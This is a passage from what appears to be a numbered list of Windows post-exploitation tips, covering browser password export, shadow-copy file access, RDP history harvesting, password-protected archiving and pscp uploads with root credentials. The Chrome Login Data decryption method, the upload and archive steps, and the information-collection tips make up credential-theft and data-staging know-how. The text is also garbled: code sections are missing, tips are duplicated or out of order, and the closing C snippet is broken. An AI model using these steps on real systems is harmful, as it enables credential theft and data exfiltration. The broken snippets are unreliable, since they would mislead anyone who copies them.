Find the registry HKEY_CURRENT_USER\Control Panel\Desktop, if there is a key value SCRNSAVE.EXE.


If the screen saver is turned on, check the key value ScreenSaveTimeOut to get the screen saver startup time (in seconds).

REG QUERY "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveTimeOut

Tips 59 Hide the interface of the specified process

Change window state via API ShowWindowAsync.


Tips 60 Screen capture of Windows system via Powershell

Tips 61 View the programs currently installed on Windows systems

Obtained by enumerating the registry keys HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall


The directory of the 32-bit program under the 64-bit system is HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall


Tips 62 Get the current system type via wmi

wmic /NAMESPACE:"\\root\CIMV2" PATH Win32_ComputerSystem get PCSystemType /FORMAT:list
Value Meaning
0 (0x0) Unspecified
1 (0x1) Desktop
2 (0x2) Mobile
3 (0x3) Workstation
4 (0x4) Enterprise Server
5 (0x5) Small Office and Home Office (SOHO) Server
6 (0x6) Appliance PC
7 (0x7) Performance Server
8 (0x8) Maximum

Tips 63 Export the password saved by the Chrome browser

1, online

Method 1:

Read the database file %LocalAppData%\Google\Chrome\User Data\Default\Login Data. If the Chrome browser is running and cannot be read directly, you need to copy it first.

Direct decryption in the current system call API CryptUnprotectData.

Method 2:





2, offline

You do not need to obtain the user's plain text password when using the Master Key.



Tips 65 Get the history file of the system through ShadowCopy

Query whether the current system has a snapshot:

vssadmin list shadows

Access the files in the history snapshot:

mklink /d c:\testvsc \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy15\
dir c:\testvsc



Tips 64 How to execute multiple commands on the command line

aa && bb

Execute aa, and then execute bb after success.

aa || bb

Execute aa first. If the execution is successful, bb is no longer executed. If it fails, bb is executed again.

aa & bb

Execute aa first and then bb, regardless of whether aa is successful.

Tips 65 Sending mail via powershell (with attachments)

Two methods, the code can refer to:

Tips 66 Get the remote desktop connection history of all users by reading the registry with powershell

The default read registry can only get the registry information of the currently logged in user. You can get the registry configuration of the unlogged in user by loading the configuration unit with reg load.

The code can refer to:



Tips 67 Use pscp to upload files from Windows to Linux via the command line

download link:

The upload command is as follows:

pscp.exe -l root -pw toor -r c:\1\putty.exe

It will prompt whether to store the cache file.

Enter Y, create a new key in the registry: HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\SshHostKeys, do not need to enter Y again for the next connection.

Enter N, do not save the registry key.

Implement the method of automatically entering the N command:

echo n |pscp.exe -l root -pw toor -r c:\1\putty.exe

Tips 68 Enumeration of Windows System Handles

  • On Windows 8 and later, NtQueryInformationProcess with ProcessHandleInformation is the most efficient method.
  • On Windows XP and later, NtQuerySystemInformation with SystemExtendedHandleInformation.
  • On Windows 7 and later, NtQuerySystemInformation with SystemHandleInformation can be used.


  • WinXP and Win7,ObjectTypeNumber = 0x1c
  • Win8 and later,ObjectTypeNumber = 0x1e

Tips 69 Use rar.exe to compressed file

Maximum compression ratio:

rar.exe a -m5 1.rar 1.txt -p123456

Volume compression, one compression package per 10MB:

rar.exe a -m5 -v10m 1.rar 1.txt -p123456


rar.exe e 1.rar -p123456

Tips 70 Use the command tasklist/v to column processes

The /v parameter shows detailed information, which is helpful for collecting information.

Tips 71 Remove the first string from the array in C language

WCHAR srcString[20] = L"I love you!";
WCHAR targetString[20];
wcsncpy_s(targetString, wcslen(targetString), srcString + 1, (wcslen(targetString) - 1);
wprintf_s(L"%s\n", targetString);